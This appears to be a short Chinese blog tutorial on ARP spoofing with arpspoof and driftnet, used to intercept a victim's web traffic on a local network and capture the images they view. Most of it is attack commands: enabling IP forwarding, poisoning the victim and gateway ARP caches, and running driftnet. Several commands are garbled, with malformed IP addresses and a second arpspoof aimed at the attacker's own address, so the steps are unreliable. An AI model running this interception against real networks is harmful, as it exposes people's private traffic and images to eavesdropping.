arpspoof+driftnet+ ARP欺騙簡單圖片抓取
阿新 • • 發佈:2018-08-31
roc ipv4 ech 空間 info 受害者 數據 發送 運行
arpspoof+driftnet+ ARP欺騙簡單圖片抓取
driftnet是一款簡單而使用的圖片捕獲工具,可以很方便的在網絡數據包中抓取圖片。該工具可以實時和離線捕獲指定數據包中是圖片
環境
受害ip:192.168.228.130
攻擊ip:192.168.228.129
網關:192.168.228.2
條件
1,開啟或關閉IP轉發
2,向被攻擊機器發送arp欺騙數據包,冒充網關
3,向網關發送arp數據欺騙網關,冒充被攻擊機器
4,運行driftnet截取圖片
開啟IP轉發功能
cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward
重定向受害者的流量傳送給攻擊者
arpspoof -t 192.168.130 168.168.228.2 -i eth0
使網關的數據重定向到攻擊者的機器。(流量由網關到攻擊者再到受攻擊者)
arpspoof -t 168.168.228.2 192.168.228.129 -i eth0
監聽
driftnet -i eth0
抓到的QQ空間圖片-^^-
arpspoof+driftnet+ ARP欺騙簡單圖片抓取